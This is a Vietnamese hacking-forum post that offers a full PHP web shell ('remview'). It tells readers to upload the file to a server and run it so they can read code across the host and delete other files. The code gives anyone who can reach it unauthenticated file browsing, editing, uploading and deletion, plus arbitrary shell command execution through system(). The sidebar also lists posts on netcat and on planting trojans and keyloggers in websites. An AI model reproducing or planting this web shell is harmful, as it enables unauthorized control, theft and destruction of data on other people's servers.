Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Thu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Fri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Fri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Thu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Tue Apr 10, 2012 1:14 am by Admin

Shopmotion


Affiliates
free forum


Copy nội dung sau thành 1 file *.php - View code

Go down

Copy nội dung sau thành 1 file *.php - View code

Post  Admin on Thu May 26, 2011 2:10 pm

Copy nội dung sau thành 1 file *.php. Up lên server, chạy file đó, bạn có thể xem code của hầu hết các file trong host, chịu khó tìm hiểu 1 chút thì có thể view code toàn server, hoạc thêm chút lệnh của unix nữa là có thể xóa del hầu hết mí file trong đó.

Code:
<?php
$default_directory = dirname($PATH_TRANSLATED);
$show_icons = 0; define("REMY_EXPLORER_VERSION", "v1.0");
define("BACKGROUND_COLOR", "\"#000000\"");
 define("FONT_COLOR", "\"#ffffff\"");
define("TABLE_BORDER_COLOR", "\"#ffffff\"");
define("TABLE_BACKGROUND_COLOR", "\"#000000\"");
 define("TABLE_FONT_COLOR", "\"#ffffff\"");
define("COLOR_PRIVATE", "\"#ffbb99\"");
define("COLOR_PUBLIC", "\"#000000\"");
define("TRUE", 1);
define("FALSE", 0);
if (!isset($dir)) $dir = $default_directory;
$dir = stripslashes($dir);
$dir = str_replace("\\", "/", $dir);
 $associations = array( "gif" => array( "function" => "viewGIF", "icon" => "icons/image2.gif" ), "jpg" => array( "function" => "viewJPEG", "icon" => "icons/image2.gif" ), "jpeg" => array( "function" => "viewJPEG", "icon" => "icons/image2.gif" ), "wav" => array( "function" => "", "icon" => "icons/sound.gif" ), "mp3" => array( "function" => "", "icon" => "icons/sound.gif" ) );
 if ($action != "view"): ?>
<html>
<head>
<title>HOANGINLOVE Explorer - remview</title>
<style type="text/css">
<!-- .body { font-family: 'Verdana'; font-size: 13; color: <? echo FONT_COLOR; ?> } table, div, tr, td
{font: 13 'Verdana'; color: <? echo TABLE_FONT_COLOR; ?> }
a {text-decoration: none; color: "#00ff00" }
 a:hover {text-decoration: underline; color: "#ff0000" }
 --> </style> </head>
<body class="body" bgcolor=<? echo BACKGROUND_COLOR; ?>> <? endif;
 function readDirectory($directory)
 { global $files, $directories, $dir;
 $files = array();
 $directories = array();
 $a = 0; $b = 0;
$dirHandler = opendir($directory);
while ($file = readdir($dirHandler))
{ if ($file != "." && $file != "..")
{ $fullName = $dir.($dir == "/" ? "" : "/").$file;
if (is_dir($fullName)) $directories[$a++] = $fullName;
 else $files[$b++] = $fullName; } }
 sort($directories); sort($files); };
function showInfoDirectory($directory)
{ global $PHP_SELF; $dirs = split("/", $directory);
 print "<b>Directory /"; for ($i = 1; $i < (sizeof($dirs));
$i++) { print "<a href=\"$PHP_SELF?dir=";
for ($a = 1; $a <= $i; $a++) echo "/$dirs[$a]"; echo "\">$dirs[$i]";
if ($directory != "/") echo "/"; } print "</b>\n";
print "Free space on disk: ";
 $freeSpace = diskfreespace($directory);
 if ($freeSpace/(1024*1024) > 1024) printf("%.2f GBytes", $freeSpace/(1024*1024*1024));
 else echo (int)($freeSpace/(1024*1024))."Mbytes\n"; };
function showDirectory($directory)
{ global $files, $directories, $fileInfo, $PHP_SELF;
readDirectory($directory);
showInfoDirectory($directory); ?>
<p><table cellpadding=3 cellspacing=1 width="100%" border="0" bgcolor=<? echo TABLE_BORDER_COLOR; ?>>
<tr bgcolor="#000000"> <? if ($show_icons): ?> <td width="16" align="center" bgcolor=<? echo TABLE_BACKGROUND_COLOR ?>>
 </td> <? endif; ?>
 <td align="center">
<b><small>NAME</small></b></td>
<td align="center"><b><small>SIZE</small></b></td>
 <td align="center"><b><small>LAST MODIF.</small></b></td>
<td align="center"><b><small>PERMISSIONS</small></b></td>
 <td align="center"><b><small>ACTIONS</small></b></td> </tr>
<? for ($i = 0; $i < sizeof($directories);
$i++) { $fileInfo->getInfo($directories[$i]);
showFileInfo($fileInfo); } for ($i = 0; $i < sizeof($files); $i++) { $fileInfo->getInfo($files[$i]);
 showFileInfo($fileInfo); } ?>
 </table>
 <? }; class fileInfo { var $name, $path, $fullname, $isDir, $lastmod, $owner, $perms, $size, $isLink, $linkTo, $extension; function permissions($mode) { $perms = ($mode & 00400) ? "r" : "-";
$perms .= ($mode & 00200) ? "w" : "-";
$perms .= ($mode & 00100) ? "x" : "-";
$perms .= ($mode & 00040) ? "r" : "-";
$perms .= ($mode & 00020) ? "w" : "-";
$perms .= ($mode & 00010) ? "x" : "-";
$perms .= ($mode & 00004) ? "r" : "-";
 $perms .= ($mode & 00002) ? "w" : "-";
$perms .= ($mode & 00001) ? "x" : "-"; return $perms; }
function getInfo($file)
{ $this->name = basename($file);
$this->path = dirname($file);
 $this->fullname = $file; $this->isDir = is_dir($file);
 $this->lastmod = date("m/d/y, H:i", filemtime($file));
$this->owner = fileowner($file);
$this->perms = $this->permissions(fileperms($file));
 $this->size = filesize($file);
$this->isLink = is_link($file);
if ($this->isLink) $this->linkTo = readlink($file);
 $buffer = explode(".", $this->fullname);
 $this->extension = $buffer[sizeof($buffer)-1]; } };
 $fileInfo = new fileInfo; function showFileInfo($fileInfo)
 { global $PHP_SELF, $associations; echo "\n<tr bgcolor=".TABLE_BACKGROUND_COLOR." align=\"center\">";
if ($show_icons) {
echo "<td>"; if ($fileInfo->isDir) echo "<img src=\"icons/dir.gif\">";
elseif ($associations[$fileInfo->extension]["icon"] != "") echo "<img src=\"".$associations[$fileInfo->extension]["icon"]."\">";
else echo "<img src=\"icons/generic.gif\">"; echo "</td>"; } echo "<td align=\"left\"";
 if ($fileInfo->perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC;
if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE; echo ">";
 if ($fileInfo->isLink) { echo $fileInfo->name." -> ";
$fileInfo->fullname = $fileInfo->linkTo;
 $fileInfo->name = $fileInfo->linkTo; }
if ($fileInfo->isDir) { echo "<b>fullname\" ";
echo ">$fileInfo->name</b>"; }
 else echo $fileInfo->name;
echo "</td>";
echo "<td>$fileInfo->size</td>";
echo "<td>$fileInfo->lastmod</td>";
echo "<td>$fileInfo->perms</td>";
echo "<td>"; if (!$fileInfo->isDir) {
 if ($fileInfo->perms[6] == 'r') { echo "fullname&action=view\"> View"; }
 if ($fileInfo->perms[7] == 'w') {
 echo "fullname&action=edit\"> Edit"; echo "fullname&action=delete\"> Del"; } }
 echo "</tr>"; };
function viewFile($file)
{ global $associations, $fileInfo;
$fileInfo->getInfo($file);
if (!$associations[$fileInfo->extension] || $associations[$fileInfo->extension]["function"] == "") showFile($file);
 else $associations[$fileInfo->extension]["function"]($file); };
 function showFile($file, $editing = 0)
{ global $PHP_SELF, $dir; $handlerFile = fopen($file, "r") or die("ERROR opening file $file");
if ($editing) echo "<h3>
<b>Edit file $file</b></h3><hr>";
else echo "<h3><b>File $file</b></h3><hr>";
 echo "<form";
if ($editing) echo " action=\"$PHP_SELF?action=save&dir=$file\" method=\"post\"";
 echo ">";
 $buffer = fread($handlerFile, filesize($file));
$buffer = str_replace("&", "&", $buffer);
$buffer = str_replace("<", "<", $buffer);
$buffer = str_replace(">", ">", $buffer);
 echo "<textarea wrap=\"off\" cols=\"90\" rows=\"20\" name=\"text\">$buffer</textarea>";
if ($editing) echo "<p>
<input type=\"submit\" name=\"Submit\" value=\"Save changes\"></p>\n</form>";
echo "</form>";
fclose($handlerFile); };
 function saveFile($file)
{ global $dir, $text; $handlerFile = fopen($file, "w") or die("ERROR: Could not open file ".basename($file)." for writing");
$text = stripslashes($text);
fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file.");
fclose($handlerFile);
 echo "Changes has been saved in ".basename($file)."<hr>";
 $dir = dirname($file); };
 function uploadFile()
{ global $HTTP_POST_FILES,$dir;
copy($HTTP_POST_FILES["userfile"][tmp_name], $dir."/".$HTTP_POST_FILES["userfile"][name]) or die("Error uploading file".$HTTP_POST_FILES["userfile"][name]);
 echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded.";
 //unlink($userfile); };
 function deleteFile($file)
 { global $confirm;
if ($confirm != TRUE) die("Confirm deletion of $file");
else {
if (!unlink($file)) return FALSE; return TRUE; } };
 function viewFileHeader($file, $header)
 { header($header); readfile($file); };
function viewGIF($file)
{ viewFileHeader($file, "Content-type: image/gif"); };
function viewJPEG($file)
{ viewFileHeader($file, "Content-type: image/jpeg"); };
 switch ($action) { case "phpinfo": phpinfo();
die();
case "view": viewFile($dir);
break;
case "edit": showFile($dir, 1); break;
case "download": viewFileHeader($dir, "Content-type: unknown"); break; case "delete": if (!deleteFile($dir)) echo "Could not delete file $dir
"; else echo "File $dir deleted succesfully
"; $dir = dirname($dir);
showDirectory($dir);
 break; case "exec": echo "<pre>\n";
echo system($dir);
echo "\n</pre>";
exit();
case "upload": uploadFile(); showDirectory($dir);
break;
case "save": saveFile($dir);
default: showDirectory($dir); break; };
if ($action != "view"): ?>
<p> <table border="0"> <tr><td>
<form method="get" action=<? echo "\"$PHP_SELF\""; ?>>
<input type="hidden" name="dir_from" value=<? echo "\"$dir\""; ?>> <select name="action" size="1"> <option value="jump" selected>Jump to directory</option> <option value="makedir">Create directory</option> <!-- Not implemented yet --> <option value="exec">Execute shell cmd</option> </select>
<input type="text" name="dir" size="20">
<input type="submit" value="Go"> </form> </td>
<? if ((fileperms($dir) & 00002)): ?> <td>
<form enctype="multipart/form-data" action="<? print "$PHP_SELF?dir=$dir&action=upload"; ?>" method=post> <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
<input name="userfile" type="file">
<input type="submit" value="Upload file"> </form> </td>
<? endif; ?> </tr> </table> <p> <hr> </p> </body> </html> <? endif; ?>     
avatar
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

View user profile http://hackis.forumvi.com

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum